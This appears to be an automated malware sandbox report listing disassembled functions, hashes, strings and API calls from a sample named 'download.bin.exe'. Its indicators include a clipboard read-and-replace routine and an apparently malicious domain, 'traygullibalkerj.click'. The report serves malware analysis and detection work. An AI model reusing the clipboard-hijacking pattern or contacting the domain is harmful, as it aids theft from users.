Opcode ID: 8225ba784ce70c215e259df774c235aa111f1efab2850dc84d9d6c00b0f6aa45
Instruction ID: 52cc3530bfc7dd970c46626a0c7936a501baed8c2e77b9020c39b61b373f0b67
Opcode Fuzzy Hash: 8225ba784ce70c215e259df774c235aa111f1efab2850dc84d9d6c00b0f6aa45
Instruction Fuzzy Hash: FB812370E0520CCFDB14DFAAD889BADBBF6FB49300F10906AD41AA7265DB349995CF50

Function 05C3A57E Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705145119.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a9750f53bc8845a1e67f8396cb3258a495e4c2da971f2e72b339561b39e7da
Instruction ID: b069dc7072d589d037374372e926cba417fac5286f2dfff2215cd58e73d6059c
Opcode Fuzzy Hash: e0a9750f53bc8845a1e67f8396cb3258a495e4c2da971f2e72b339561b39e7da
Instruction Fuzzy Hash: 5A710170E0520CCFDB14DFAAD889BADBBF6FB49300F10906AD41AA7265DB349995CF50

Function 05A561C8 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90993fd5a381920c8c1fa21c98dd4b63eba1d773bd60ea2d4f44ccab304a4734
Instruction ID: d1c012619103d4d061324db3d7bce166fbc8ec5d33fd75d7aa4a4af16176ca21
Opcode Fuzzy Hash: 90993fd5a381920c8c1fa21c98dd4b63eba1d773bd60ea2d4f44ccab304a4734
Instruction Fuzzy Hash: 5151BCB1E016199BDB18CFABD94069EFBF3BFC8310F54C17AD918AB264EB3059458B50

Function 05C37E10 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705145119.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 888dc7a82b82968795c61b1df103946c8467d15f0bcfdd2e7de49a5f9a1ef258
Instruction ID: 606728de2969d45edf04005e17403bc94eadfcce9e56377d7e5035758258caba
Opcode Fuzzy Hash: 888dc7a82b82968795c61b1df103946c8467d15f0bcfdd2e7de49a5f9a1ef258
Instruction Fuzzy Hash: 1951E3B490921CDFDB14CFAAD845BEDBBF2FB49300F10942AE805A7254DB745E8ACB50

Function 05C37E20 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705145119.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ebb085ea8e23dff5ea3964631ca6709a966a2bec22dce612e9316ffc1d1dd6
Instruction ID: 5743e8a242971b8c9bc2ff8547f1c94ef0416f5af586735a0ffd4196194104bd
Opcode Fuzzy Hash: 00ebb085ea8e23dff5ea3964631ca6709a966a2bec22dce612e9316ffc1d1dd6
Instruction Fuzzy Hash: 2451C4B490921CDFDB14CF9AD845BEDBBF6FB4A300F00942AD815A7254DB745E86CB50

Function 01840825 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689085036.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1840000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c852ddfb8dc1b5b3d443fda38ed8adba8e9db6c7577f21ff34f350c41ce0c981
Instruction ID: c8a2858a5e98df2f7529537607e9910b5787683d993d04c229cb620874db054d
Opcode Fuzzy Hash: c852ddfb8dc1b5b3d443fda38ed8adba8e9db6c7577f21ff34f350c41ce0c981
Instruction Fuzzy Hash: 224100B4D0424CCFDB10CFA9D894B9EBFF1AB0A304F249129E919AB251DB349985CF45

Function 0184082C Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689085036.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1840000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb10bf399470040303fec88a9282cee9011531a8d52115a8bf0a437429796a7
Instruction ID: f28ccff1de8dbd8d92d48900abd16052a1bd66b1cb699fb42a4043947602ab9b
Opcode Fuzzy Hash: 1fb10bf399470040303fec88a9282cee9011531a8d52115a8bf0a437429796a7
Instruction Fuzzy Hash: 30410FB0D0035CCFDB10CFA9D884B9EBBF1AB0A304F209129E915EB250DB749985CF85

Function 01842783 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689085036.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1840000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e19f59c21684b9dd05f226d5d35a9abc317ec557389a7c493d27394fa9017e3
Instruction ID: 97806a8fce5f9d4dc0026029c5bc2bc1d59f207f49777bcaa6069e26a0d88dfd
Opcode Fuzzy Hash: 7e19f59c21684b9dd05f226d5d35a9abc317ec557389a7c493d27394fa9017e3
Instruction Fuzzy Hash: 18514E75E056588BEB2CCF6B9D406CAFAF3AFC9340F04C1FA954CA6214DB700A858F51

Function 05E30040 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705689394.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713e2aad0203b3915000ae17e4893e4597f271e559677b5dac54f4d8d8794fa7
Instruction ID: a846f4e959013a3dfab95dff6ae591acc10fd1833b9d088e167bcee522d22551
Opcode Fuzzy Hash: 713e2aad0203b3915000ae17e4893e4597f271e559677b5dac54f4d8d8794fa7
Instruction Fuzzy Hash: A941A974D056298BDB68DF2AC949799BBF6BF88300F04D0EAD94DA6254EB345E85CF00

Function 05A50007 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b3866da932e979da83a22a0945f381be0b3302cf3d192d02bd016391614808
Instruction ID: a88fde824419229b594d986a170661669c38606a46fa0c66a9b83e654f42ee39
Opcode Fuzzy Hash: b7b3866da932e979da83a22a0945f381be0b3302cf3d192d02bd016391614808
Instruction Fuzzy Hash: 7031EE71D057548FEB1ACF678C50699BBF7BFC5304F08C1FAD849AA255E6740A828F00

Function 05A50040 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fec3928f338aec96d63e9f2144f8557bc95af9a29c2d4a0fe88af007a822bc
Instruction ID: f2615a7a77d54d1b5c28430979fe4e78eb893aef7b7bd944330b80fc108a806e
Opcode Fuzzy Hash: 26fec3928f338aec96d63e9f2144f8557bc95af9a29c2d4a0fe88af007a822bc
Instruction Fuzzy Hash: B9318F71E156588BEB59CF67DC4469DF6FBBFC8710F04D1AAD80CA6254DB740A818F01

Function 05E30007 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705689394.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17cbf4c2ca6a329963119b1ba5a92ce35e42b605186244b9ba0aeec02c112563
Instruction ID: 40eea3d29f8faad0a50ea04d9282dbb3a108fbc4d47993965af6c21541ec7436
Opcode Fuzzy Hash: 17cbf4c2ca6a329963119b1ba5a92ce35e42b605186244b9ba0aeec02c112563
Instruction Fuzzy Hash: 13311C71D057548FE729CF26C849399BAF3AF85300F08D0FA954CAA265EB340A86CF10

Function 05831378 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704032898.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1226f8ed377705d079a88343b9062c826583be270a18602344bc9fd390357e09
Instruction ID: 9d2b14877a502fa165b3d5c1c94f78dbe5fd77d450d55f64b4b4444855f72a00
Opcode Fuzzy Hash: 1226f8ed377705d079a88343b9062c826583be270a18602344bc9fd390357e09
Instruction Fuzzy Hash: 353179B1D056188BEB18CF6BCC5939AFAF3AFC4304F14C1A9C84CA6255EB750985CF40

Function 05E3001F Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705689394.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e30000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81e8ee129b566a0099e4627599332de0f0c07977534f5b2f2d3b729e3225bb4b
Instruction ID: 53f25a525ca2c4521cad88a36fb104454fa0b954844b7b6a7e092bb6ce71ea09
Opcode Fuzzy Hash: 81e8ee129b566a0099e4627599332de0f0c07977534f5b2f2d3b729e3225bb4b
Instruction Fuzzy Hash: 1931DB71D057548BEB6DCF2A8D4939ABAF3AF85300F08D0FA954CA6255EB740A86CF11

Function 05D6E1E8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d3d432367af6a770984127970b71c805f85b2fbedad2b50c521b520bc7802f
Instruction ID: 6577c30c649b245ff6f333daa33d8a6f50ad4c0c03ccd26e02ee346e9ab959bb
Opcode Fuzzy Hash: 12d3d432367af6a770984127970b71c805f85b2fbedad2b50c521b520bc7802f
Instruction Fuzzy Hash: B321DBB5D142189FCB14CFA9D984AEEBBF5FB49320F10902AE805B7210C735A945CFA4

Function 05D6E1F0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d17a513c060c6e5dec38e8020fed0e815734e771ef51ff4aea7cb248d1190811
Instruction ID: c283f37a18eb9be849cf8bd88100f2ce74d40cdf21dd2ce41d8eed6925bf1878
Opcode Fuzzy Hash: d17a513c060c6e5dec38e8020fed0e815734e771ef51ff4aea7cb248d1190811
Instruction Fuzzy Hash: E721BCB5D042189FCB14DFA9D984AEEFBF5FB49320F10902AE805B7210C735A945CFA4

Function 05D22210 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d5b8bca5b810b1c07473dc12fdeb1b5f08bc43c16d6b7ea8698b84d2b5677c
Instruction ID: 2bd36385061c876e061f446579385a7458e6bda338e94e9c43701712e751415a
Opcode Fuzzy Hash: d6d5b8bca5b810b1c07473dc12fdeb1b5f08bc43c16d6b7ea8698b84d2b5677c
Instruction Fuzzy Hash: 51E0B67AD051299BCB00CF85EC40AEDF7B1FB59324F518017EA21B3200D334A5118B54

Function 05A51478 Relevance: 6.3, Strings: 5, Instructions: 50COMMON

Download Yara Rule

Strings

G, xrefs: 05A51A7C
v, xrefs: 05A51AA8
O, xrefs: 05A501C4
&, xrefs: 05A514BD
S, xrefs: 05A50198

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID: &$G$O$S$v
API String ID: 0-2764627275
Opcode ID: 6f3c19edab0ef3ce8826ed152c53c83c51d89b4fcc92b70ec107b4bdf8555918
Instruction ID: a553abe489abb31de40accab5409027b12c6635d748805ec321031e8e6462659
Opcode Fuzzy Hash: 6f3c19edab0ef3ce8826ed152c53c83c51d89b4fcc92b70ec107b4bdf8555918
Instruction Fuzzy Hash: 81219EB4D1522C9FEB24DF68D84EF9DB7B1BB04314F0085AAE909A3280C7740A85CF55

Function 05A5CD27 Relevance: 5.0, Strings: 4, Instructions: 37COMMON

Download Yara Rule

Strings

G, xrefs: 05A5CD3B
a, xrefs: 05A5CD6B
d, xrefs: 05A5CD0D
", xrefs: 05A5CCDD

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID: "$G$a$d
API String ID: 0-1859316011
Opcode ID: a79258ca2ea584c3f8bf5d701f0bcac898f39a318fc01255ff960e03c9951869
Instruction ID: 2c710ed58f6ed378a648e0b082500e3a12bb78f2a2fe025647127b63fdc82284
Opcode Fuzzy Hash: a79258ca2ea584c3f8bf5d701f0bcac898f39a318fc01255ff960e03c9951869
Instruction Fuzzy Hash: 7E11C2B08097A8CFEB258F64C898F99BBB2FF05325F1015EAD849A6241C7744E95CF12

Analysis Process: download.bin.exePID: 5440, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	30.4%
Total number of Nodes:	368
Total number of Limit Nodes:	33

Executed Functions

Function 00412730 Relevance: 180.5, APIs: 4, Strings: 98, Instructions: 2017COMMON

Download Yara Rule

Strings

}, xrefs: 0041370C
D, xrefs: 00413BEA
~, xrefs: 004142A4
q, xrefs: 00414254
M, xrefs: 00414294
`, xrefs: 00413879
~, xrefs: 00413EC8
B, xrefs: 00413F28
m, xrefs: 004131E2
/, xrefs: 00414344
@, xrefs: 00412FD2
{, xrefs: 004142D4
8, xrefs: 00413C0A
~, xrefs: 004142B4
C, xrefs: 004139FA
x, xrefs: 004141E4
!, xrefs: 00413F40
y, xrefs: 00413182
N, xrefs: 004141D4
D, xrefs: 00413F18
<, xrefs: 00413C2A
|, xrefs: 00413ED8
_, xrefs: 00412796
Z, xrefs: 004142E4
H, xrefs: 00412E3F
B, xrefs: 00414214
c, xrefs: 004131D2
N, xrefs: 00413F48
4, xrefs: 00413C6A
x, xrefs: 00413EF8
6, xrefs: 00413C5A
b, xrefs: 00414284
Z, xrefs: 004129C0
b, xrefs: 00414314
p, xrefs: 00413EB8
F, xrefs: 00413F08
v, xrefs: 00414304
0, xrefs: 004129B8
:, xrefs: 00413BFA
>, xrefs: 00413C1A
O, xrefs: 004141C4
D, xrefs: 0041442D
T, xrefs: 004141F4
D, xrefs: 00414693
a, xrefs: 004131C2
n, xrefs: 004132D0
7, xrefs: 00413C62
*, xrefs: 0041431C
L, xrefs: 00413F58
P, xrefs: 00413FB8
0, xrefs: 00413C4A
w, xrefs: 004136DC
V, xrefs: 00413F88
s, xrefs: 00414224
(, xrefs: 0041432C
s, xrefs: 00414244
@, xrefs: 00413F38
2, xrefs: 00413C3A
z, xrefs: 00413EE8
:, xrefs: 00413F50
g, xrefs: 004131B2
., xrefs: 0041433C
,, xrefs: 0041434C
S, xrefs: 0041316A
a, xrefs: 004142F4
q, xrefs: 004136EC
C, xrefs: 00412803
o, xrefs: 004132D8
q, xrefs: 00413A02
$, xrefs: 00412FDA
$, xrefs: 0041339E
%, xrefs: 00412FE2
~, xrefs: 00413714
T, xrefs: 00413F98
`, xrefs: 00413637
Z, xrefs: 00413FE8
r, xrefs: 00413EA8
,, xrefs: 004132E0
J, xrefs: 00413F68
R, xrefs: 00413FA8
e, xrefs: 004131A2
*, xrefs: 00413617
s, xrefs: 004136FC
\, xrefs: 00413FD8
{, xrefs: 00413192
l, xrefs: 004131DA
j, xrefs: 00412D2B
H, xrefs: 00413F78
n, xrefs: 00412B30
l, xrefs: 00414234
I, xrefs: 00414334
X, xrefs: 00413FF8
a, xrefs: 00412A75
A, xrefs: 00414204
5, xrefs: 00413FA0
^, xrefs: 00413FC8
D, xrefs: 004146A0
M, xrefs: 004131BA

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID:
String ID: !$$$$$%$($*$*$,$,$.$/$0$0$2$4$5$6$7$8$:$:$<$>$@$@$A$B$B$C$C$D$D$D$D$D$F$H$H$I$J$L$M$M$N$N$O$P$R$S$T$T$V$X$Z$Z$Z$\$^$_$`$`$a$a$a$b$b$c$e$g$j$l$l$m$n$n$o$p$q$q$q$r$s$s$s$v$w$x$x$y$z${${$|$}$~$~$~$~
API String ID: 0-3347440468
Opcode ID: 17a90dd115b491dc99ff795c6b06173fc74e0971e8a35c3d748f59a6d4c37d76
Instruction ID: 7bc959bafe82c1ea22a4c771e850f02c20cd525fd38d4412dc65fada538c7ec2
Opcode Fuzzy Hash: 17a90dd115b491dc99ff795c6b06173fc74e0971e8a35c3d748f59a6d4c37d76
Instruction Fuzzy Hash: 5313CF7150C7C08AD3349B38C4583EFBBD1AB96324F188A6EE4E9873D2D7798585874B

Function 0043BF70 Relevance: 39.4, APIs: 11, Strings: 11, Instructions: 891
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(B2BDBCA7,00000000,00000001,?,00000000), ref: 0043C3CE
SysAllocString.OLEAUT32(,_/Y), ref: 0043C46C
CoSetProxyBlanket.COMBASE(B2BDBCA7,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043C4AD
SysAllocString.OLEAUT32(n2b0), ref: 0043C534
SysAllocString.OLEAUT32(4F0B4D1F), ref: 0043C5F1
VariantInit.OLEAUT32(?), ref: 0043C65F

Strings

'y){, xrefs: 0043C596
|}, xrefs: 0043C59E
,_/Y, xrefs: 0043C467, 0043C46B
JK, xrefs: 0043C404
UvW, xrefs: 0043C56E
Rac, xrefs: 0043C586
~O, xrefs: 0043C08F
e>?<, xrefs: 0043C4CA
&e?g, xrefs: 0043C58E
se, xrefs: 0043C0B3
xY`[, xrefs: 0043C556

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: UvW$&e?g$'y){$,_/Y$JK$Rac$e>?<$xY`[$|}$~O$se
API String ID: 65563702-4186890550
Opcode ID: 3fc0ed960cd4c236a06298422fd3aa83ffa17d78c194c149fe83ba187ea7d662
Instruction ID: 92d52d75b5c97efea16007192edfc52325240bbbc7d779b04e07fb1fe17fdfe2
Opcode Fuzzy Hash: 3fc0ed960cd4c236a06298422fd3aa83ffa17d78c194c149fe83ba187ea7d662
Instruction Fuzzy Hash: 2A52FD756083409FE314CF28C89576BBBE2EFC9314F18992DE5999B391D778C806CB86

Function 00410EC3 Relevance: 25.4, APIs: 1, Strings: 13, Instructions: 892
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4, xrefs: 004113A1
&, xrefs: 004119AF
', xrefs: 004116DC
1, xrefs: 00411912
-, xrefs: 0041159E
:, xrefs: 00410F63
N, xrefs: 0041109B
-, xrefs: 004116E4
%, xrefs: 00411902
p, xrefs: 004114DC
2, xrefs: 0041190A
q, xrefs: 00410ED9
(, xrefs: 00411243

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID:
String ID: %$&$'$($-$-$1$2$4$:$N$p$q
API String ID: 0-81549213
Opcode ID: fe931eccf2a80a978aef892e7be7121a30ab33e62e57f7570ffdcd3cbcdf4470
Instruction ID: 1df2c4ad97b143b314dc5638714ac877c44f31c45cdfd425a79b69ea42bf4812
Opcode Fuzzy Hash: fe931eccf2a80a978aef892e7be7121a30ab33e62e57f7570ffdcd3cbcdf4470
Instruction Fuzzy Hash: B872B57260C7808BC3249B38C4953AFBBD1ABD9324F198A7EE5D9D73D1D67888818747

Function 030B1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 030B1032
OpenClipboard.USER32(00000000), ref: 030B103C
GetClipboardData.USER32(0000000D), ref: 030B104C
GlobalLock.KERNEL32(00000000), ref: 030B105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 030B1090
GlobalLock.KERNEL32 ref: 030B10A0
GlobalUnlock.KERNEL32 ref: 030B10C1
EmptyClipboard.USER32 ref: 030B10CB
SetClipboardData.USER32(0000000D), ref: 030B10D6
GlobalFree.KERNEL32 ref: 030B10E3
GlobalUnlock.KERNEL32(?), ref: 030B10ED
CloseClipboard.USER32 ref: 030B10F3
GetClipboardSequenceNumber.USER32 ref: 030B10F9

Memory Dump Source

Source File: 00000001.00000002.2928541856.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true

Associated: 00000001.00000002.2928526642.00000000030B0000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2928556435.00000000030B2000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_30b0000_download.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: a3b6103e5c1c2121f3940464bbcb1b0422ec36fe07cc93b399aad48ac2592c1a
Instruction ID: 23c2c33d7e5b7065372396fbf337df4e164c50c8b8bc10427b30845b7947bf88
Opcode Fuzzy Hash: a3b6103e5c1c2121f3940464bbcb1b0422ec36fe07cc93b399aad48ac2592c1a
Instruction Fuzzy Hash: BF21A131A062509BD764BB76AC19BEAB7FCFF04B81F080C28F945D6154FA658800C6B9

Function 00415650 Relevance: 17.5, APIs: 1, Strings: 8, Instructions: 1766COMMON

Download Yara Rule

Strings

84, xrefs: 004161F0
jft~, xrefs: 004160FF
03-%, xrefs: 00416254, 0041625B
R, xrefs: 004161FA
-)#i, xrefs: 004161CF
x}oo, xrefs: 0041610A
9D, xrefs: 00415891
!',$, xrefs: 004161DA

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID:
String ID: !',$$-)#i$03-%$84$9D$R$jft~$x}oo
API String ID: 0-3458018937
Opcode ID: e76adf2644e081764343fd93cef6d9ceb09ace5879f138d88933c14825763f0c
Instruction ID: 1c8b89637c15bf105e301c8ad3f2513bad909cee681a41429405d51dc43aa22c
Opcode Fuzzy Hash: e76adf2644e081764343fd93cef6d9ceb09ace5879f138d88933c14825763f0c
Instruction Fuzzy Hash: 97D221B5508341CBD7208F24D8957EFB7E1FF85318F094A2EE4999B391E7389841CB9A

Function 0040E627 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040E633

Strings

4O(I, xrefs: 0040E8FA
!`Rg, xrefs: 0040E86E
traygullibalkerj.click, xrefs: 0040EAEF
KU, xrefs: 0040E905
iD, xrefs: 0040E720
WQ, xrefs: 0040E910

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: Uninitialize
String ID: !`Rg$4O(I$traygullibalkerj.click$KU$WQ$iD
API String ID: 3861434553-261498221
Opcode ID: 961a61772d6e23c2de10c2a8fb1a49da80ba0fedac082209f67d2df180f165b9
Instruction ID: 0b62f38a77d451578450ba24b77a67ec070ec29c719fc287b6835d25f8bf5a86
Opcode Fuzzy Hash: 961a61772d6e23c2de10c2a8fb1a49da80ba0fedac082209f67d2df180f165b9
Instruction Fuzzy Hash: 8FC1CE7650C3D08AD334CF25C8A47AFBBE1AFA2304F484D6DE4D95B282D67945098B97

Function 0042F216 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 360
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F6DE

Strings

CEq<, xrefs: 0042F83F
9, xrefs: 0042F6EE
KC.H, xrefs: 0042F948
, xrefs: 0042F958

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $9$CEq<$KC.H
API String ID: 3960555810-1960931630
Opcode ID: cdd314cd0e079326b777d733ab8d8ffe85704dc2fc30c0eb19ccded29dec53d2
Instruction ID: bf4301d4d13060570d54397c3afb8db045a946f12d0963c1f61981422e1b304d
Opcode Fuzzy Hash: cdd314cd0e079326b777d733ab8d8ffe85704dc2fc30c0eb19ccded29dec53d2
Instruction Fuzzy Hash: 37B1D370A047518BD719CF29D050722FBE2AF96304F68C0AEC4DA8B792D779D80BCB54

Function 0042F5EB Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F6DE

Strings

CEq<, xrefs: 0042F83F
9, xrefs: 0042F6EE
KC.H, xrefs: 0042F948
, xrefs: 0042F958

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $9$CEq<$KC.H
API String ID: 3960555810-1960931630
Opcode ID: 2bce61d395bc1ec01601651902c9b55b02833e38f4987352067012ae99938108
Instruction ID: cd77bce2e40aa318329c6d14937da685909dac35af783ffa85557931eaf4d329
Opcode Fuzzy Hash: 2bce61d395bc1ec01601651902c9b55b02833e38f4987352067012ae99938108
Instruction Fuzzy Hash: 8AA1D270A047518BD719CF29D450322FBE2AF96304F6884AED0DA8B392D77AD80BCB54

Function 004088D0 Relevance: 7.8, APIs: 5, Instructions: 262
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004088F4
GetCurrentThreadId.KERNEL32 ref: 004088FE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000,?), ref: 00408A2D
GetForegroundWindow.USER32 ref: 00408A5E

Part of subcall function 0040CFB0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CFC3

Part of subcall function 0040B7F0: FreeLibrary.KERNEL32(00408BE0), ref: 0040B7F6
